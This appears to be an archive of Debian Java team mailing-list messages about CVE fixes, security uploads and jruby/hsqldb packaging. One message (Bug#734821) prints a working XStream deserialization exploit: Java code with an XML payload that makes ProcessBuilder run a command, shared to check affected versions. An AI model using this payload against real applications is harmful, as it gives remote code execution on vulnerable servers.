Bug#893663: freeplane: CVE-2018-1000069 XXE vulnerability

2018-04-11 Thread Sébastien Delafond 
On Apr/10, Felix Natter wrote:
> Yes and no. On jessie the patch did not cleanly apply, so I would have
> had to apply that change manually. Since removing the import has no
> effect on the semantics of the program (as long as it still compiles),
> I was too lazy. It should be ok.

Let's leave it then.

For further contributions, however, please make sure you cleanly
retrofit any patch that doesn't apply as-is: this will reduce the
overhead and questions when reviewing on our side.

> May I ask why the full source must be included?

Because they will be new on security-master.

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Bug#888316: jackson-databind: CVE-2018-5968

2018-02-10 Thread Sébastien Delafond 
On Jan/27, Markus Koschany wrote:
> I have prepared security updates of jackson-databind for Stretch and
> Jessie and would appreciate another look at the patches.
> 
> The fix for CVE-2018-5968 is straightforward. The blacklist is simply
> extended.
> 
> However upstream decided to refactor the code for CVE-2017-17485 and I
> decided to apply the changes to BeanDeserializerFactory.java again
> instead of using the new helper class SubTypeValidator. Here is my
> thought process how to create the patch based on the solution in
> upstream bug 1855 [1]
> 
> 1. Extend the blacklist. [2]
> 2. Instead of creating a new method validateSubType, I copied the fix
> into checkIllegalTypes in BeanDeserializerFactory again.[3] The behavior
> remains the same. This code catches some specific cases for the spring
> framework.
> 3. I also applied the regression fix in [4] (also mentioned in bug 1855)
> 4. I believe that [5] only applies to the refactored code and since we
> don't use that it is irrelevant for us.

Hi Markus,

thanks a lot for patches. I've reviewed them, and your approach is
sound: please upload.

Cheers,

--Seb


signature.asc
Description: PGP signature
__
This is the maintainer address of Debian's Java team
. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Bug#857343: #857343: logback deserialization vulnerability

2017-03-28 Thread Sébastien Delafond 
On Mar/28, Markus Koschany wrote:
> apparently logback < 1.2.0 is vulnerable to a deserialization issue.
> They announced it on February 8th 2017 but it appears no CVE has been
> assigned yet. [1] Fixing commit is at [2] The bug reporter claims it is
> the same issue as CVE-2015-6420 but I cannot verify that at the moment.
> Would you like to request a CVE id or shall I take care of it?

It's fine if you take care of it (and loop back to oss-sec once it's
assigned). Thanks a lot !

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Bug#758086: CVE-2014-3577: Apache HttpComponents hostname verification bypass

2015-04-15 Thread Sébastien Delafond 
On Apr/15, Markus Koschany wrote:
 I have prepared a patch for CVE-2014-3577 (commons-httpclient). [1] The
 patch is identical to the Jessie / Sid fix. Do you consider this
 vulnerability important enough for a DSA or do you prefer a point
 release update?

Hi Markus,

this issue was marked no-dsa some time ago (see
https://security-tracker.debian.org/tracker/CVE-2014-3577), so a
point-release update will be the way to go.

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Bug#780897: wheezy-security update for batik (CVE-2015-0250)

2015-03-26 Thread Sébastien Delafond 
On Mar/25, tony mancill wrote:
 I have prepared an update for batik [1] in wheezy to address
 CVE-2015-0250.  Attached is the debdiff.  Please let me know if you
 would like me to upload it.

Hi Tony,

I've reviewed your debdiff and it looks good. Please upload to
security-master-unembargoed, and we'll take it from there. Also, make
sure your package gets build with -sa, as batik will be new on
security-master.

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Bug#734821: 734821

2014-10-10 Thread Sébastien Delafond 
notfixed 734821 1.4.7-1
thanks

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:

  import java.io.IOException;
  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to /pwntester for the PoC
   * 
http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
 */
  public class XStreamExploit {
  public static void main(String[] args) throws IOException   {
  String process = /usr/bin/xeyes;
  String payload = sorted-set +
  stringfoo/string +
  dynamic-proxy +
  interfacejava.lang.Comparable/interface +
  handler class=\java.beans.EventHandler\ +
   target class=\java.lang.ProcessBuilder\ +
   command +
   string + process + /string +
   /command +
   /target +
   actionstart/action +
  /handler +
  /dynamic-proxy +
  /sorted-set;
  XStream xstream = new XStream(new DomDriver());
  xstream.fromXML(payload);
  }
  }

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers. 
Please use
debian-j...@lists.debian.org for discussions and questions.

[jruby] Package based on latest upstream

2012-06-18 Thread Sébastien Delafond 
Hi fellows,

I've been packaging jruby 1.6.7.2, and would like to upload it quite
soon, in hopes of beating the freeze and having a decently recent
version of jruby in wheezy.

I'm attaching to this email the diff between 1.5.6-3's debian/
directory, and mine, the main change being that I've had to give up on
depending on jars already packaged in Debian, and needed by jruby:
either their versions are too old or too new, but in all cases I
couldn't get jruby to compile and pass its unit tests when using
those. When using the jars shipped in the jruby tarball, building goes
fine and tests do pass, which is reassuring to say the least.

I agree it's a valuable goal to depend on software already packaged in
Debian (instead of re-shipping jars), but I unfortunately don't have
the bandwidth to bring all those third-party packages up-to-date; this
could be tackled later, but having a current jruby in stable for the
next release cycle seemed a more important goal right now.

Please let me know how you feel about this potential upload.

Cheers,

--Seb

PS: I'm not a member of pkg-java-maintainers@d.o, so please include me
explicitly in your replies.diff -u -r ../jruby-1.5.6/debian/changelog ../jruby-1.6.7.2/debian/changelog
--- ../jruby-1.5.6/debian/changelog	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/changelog	2012-06-01 14:00:39.0 +0200
@@ -1,3 +1,17 @@
+jruby (1.6.7.2-1) unstable; urgency=low
+
+  * New upstream release.
+  * Do not build-depend on older/newer version of Java libraries present
+in unstable, but instead build using those provided by upstream so
+that:
+  1) 1.6.7 can build at all
+  2) all unit tests can pass
+  * Bump-up Standards-Version.
+  * Renamed all patches to ease up insertion of new ones.
+  * Fixed compilation of cext with gcc (see http://jira.codehaus.org/browse/JRUBY-6633)
+
+ -- Sebastien Delafond s...@debian.org  Fri, 01 Jun 2012 14:00:02 +0200
+
 jruby (1.5.6-3) unstable; urgency=low
 
   [Miguel Landaeta]
diff -u -r ../jruby-1.5.6/debian/control ../jruby-1.6.7.2/debian/control
--- ../jruby-1.5.6/debian/control	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/control	2012-05-31 11:51:13.0 +0200
@@ -4,13 +4,8 @@
 Maintainer: Debian Java Maintainers pkg-java-maintainers@lists.alioth.debian.org
 Uploaders: Sebastien Delafond s...@debian.org,
  Torsten Werner twer...@debian.org
-Build-Depends: debhelper (= 6.0.7~), default-jdk, ant-optional,
- libasm3-java, libcommons-logging-java, libjarjar-java, libjoda-time-java,
- junit4, libemma-java, libbsf-java, libjline-java, bnd, libconstantine-java,
- netbase, libjgrapht0.8-java, libjcodings-java, libbytelist-java, libjffi-java,
- libjaffl-java, libjruby-joni-java, yydebug, nailgun, libjnr-posix-java,
- libjnr-netdb-java, libyecht-java (= 0.0.2-2~), cdbs
-Standards-Version: 3.9.2
+Build-Depends: debhelper (= 6.0.7~), default-jdk, ant-optional, cdbs
+Standards-Version: 3.9.3
 Homepage: http://jruby.org
 Vcs-Git: git://git.debian.org/git/pkg-java/jruby.git
 Vcs-Browser: http://git.debian.org/?p=pkg-java/jruby.git
@@ -18,7 +13,7 @@
 Package: jruby
 Architecture: all
 Replaces: jruby1.0, jruby1.1, jruby1.2
-Depends: openjdk-6-jre | java6-runtime, ${misc:Depends}, libjffi-jni
+Depends: openjdk-6-jre | java6-runtime, ${misc:Depends}
 Recommends: ri1.8
 Description: 100% pure-Java implementation of Ruby
  JRuby is a 100% pure-Java implementation of the Ruby programming language.
diff -u -r ../jruby-1.5.6/debian/links ../jruby-1.6.7.2/debian/links
--- ../jruby-1.5.6/debian/links	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/links	2012-05-31 11:49:24.0 +0200
@@ -3,4 +3,4 @@
 usr/lib/jruby/bin/jruby.rb  usr/bin/jruby.rb
 usr/lib/jruby/bin/jrubycusr/bin/jrubyc
 usr/lib/jruby/lib/jruby.jar usr/share/java/jruby.jar
-usr/share/ri/1.8/system usr/lib/jruby/share/ri/1.8/system
+
Only in ../jruby-1.5.6/debian/patches: 0001-Fix-shebang-lines.patch
Only in ../jruby-1.5.6/debian/patches: 0002-jruby_home-is-at-a-specific-location-on-Debian.patch
Only in ../jruby-1.5.6/debian/patches: 0003-do-not-install-gems.patch
Only in ../jruby-1.5.6/debian/patches: 0004-replace-bundled-libraries.patch
Only in ../jruby-1.5.6/debian/patches: 0005-ignore-test-failures.patch
Only in ../jruby-1.5.6/debian/patches: 0006-do-not-build-InvokeDynamicSupport.java.patch
Only in ../jruby-1.5.6/debian/patches: 0007-use-unversioned-jarjar.jar.patch
Only in ../jruby-1.6.7.2/debian/patches: 0010-Fix-shebang-lines.patch
Only in ../jruby-1.6.7.2/debian/patches: 0020-jruby_home-is-at-a-specific-location-on-Debian.patch
Only in ../jruby-1.6.7.2/debian/patches: 0030-do-not-install-gems.patch
Only in ../jruby-1.6.7.2/debian/patches: 0040-replace-bundled-libraries.patch
Only in ../jruby-1.6.7.2/debian/patches: 0045-do-not-bundle-all-jffi-jars.patch
Only in ../jruby-1.6.7.2/debian/patches: 0050-ignore-test-failures.patch
Only in ../jruby-1.6.7.2/debian/patches:

Re: planning (a) hsqldb transition(s)

2012-04-30 Thread Sébastien Delafond 
On Apr/30, Rene Engelhard wrote:
 Hi,
 
 On Fri, Apr 13, 2012 at 04:31:31PM +0200, Rene Engelhard wrote:
   so I'd like to upload that to unstable (and adapt libreoffice) if it 
   happens.
   
   But this problem makes me ask
   
   Q1) does anyone of your programs using libhsqldb-java have the same 
   problem? Do we need to wait for them to be patches
   to upload 1.8.1.x?
   
   As you probably noticed, libhsqldb-java is 1.8.x while we have a
   libhsqldb2.0-java in experimental (and there's a 2.2.8 released, which I
   packaged some days ago and is ready to upload here now that I long 
   neglected
   because I didn't care as OOo and LibO *do* need 1.8.x.)
   
   Q2) Would you agree that renaming libhsqldb-java to libhsqldb1.8-java 
   would be
   worthwile? We then can upload 2.2.8 as libhsqldb-java. This needs 
   source
   uploads of all the above packages, though.
   
   Q3) Does anyone want to overtake libhsqldb-java (2.x) then? I am only
   interested in 1.8.x for OOo/LO.
   
   Q4) does anyone need 2.0 *and* 2.2 be different? Anything working with 2.0
   and not 2.2? (Doubt that, but better safe than sorry) - in that case 
   we
   need to have libhsqldb1.8-java, libhsqldb2.0-java and the new
   libhsqldb-java)
  
  And noone except tillea (for debian-med)[1] answered here. pkg-java,
  Sebastien?
 
 Two weeks later, and rougly one month before the freeze? PING? Can you
 (= pkg-java and Sebastien!) please answer?

Sorry for the lag, real life has been a bit hectic lately. I'm fine
with your upload plan, and will make my paros package depend on
libhsqldb1.8-java once you upload it. paros is not maintained upstream
anymore, but I will be able to take care of its patching to ensure
1.8.1.x compatibility, if need be.

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Re: JRuby packaging

2011-09-13 Thread Sébastien Delafond 
Hi Alex,

a while ago I transferred maintenance of jruby over to the Debian Java
Maintainers, whom I cc'ed to this email. They'll probably be able to
tell you more...

Cheers,

--Seb

On Sep/12, Alex Young wrote:
 Hi there,
 
 I'm emailing you because your name is on the Debian jruby-1.5.1
 package.  Do you know if there is a current attempt to package a
 more recent version of jruby than 1.5.1?  If so, could you point me
 in the right direction?  If not, it's just possible I might be able
 to convince my employer to stump up some manpower to take it on.
 
 Thanks,
 -- 
 Alex
 

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers. 
Please use
debian-j...@lists.debian.org for discussions and questions.

Re: [packaging] JRuby in Debian

2010-12-06 Thread Sébastien Delafond 
Hi Thomas,

jruby is now being packaged by the Debian Java Maintainers, whose main
goal is to get jruby back into main again.

I'm cc'ing the team to this email, as I'm sure they'll be interested in
working closely with such a responsive upstream ;)

Cheers,

--Seb

On Dec/02, Thomas E Enebo wrote:
 Hello,
 
   I know in the past you have been helping us to get JRuby
 installed/up-to-date/our-bad-dependencies in Debian.  I was wondering
 if you are insterested in helping us update JRuby whenever we put out
 a new release.  I would send an email out when a release occurs and
 then you would go through whatever process is needed to it into
 Debian.
 
   There were some issues in the past with our dependencies and so we
 of course will also help do our best to help straighten those out so
 this can be a more painless process.  Are you game?  Is there another
 person we should be talking to that you know of?  We are really
 interested in trying to better coordinate releases of JRuby on various
 distributions...
 
 -Tom

__
This is the maintainer address of Debian's Java team
http://lists.alioth.debian.org/mailman/listinfo/pkg-java-maintainers. Please 
use
debian-j...@lists.debian.org for discussions and questions.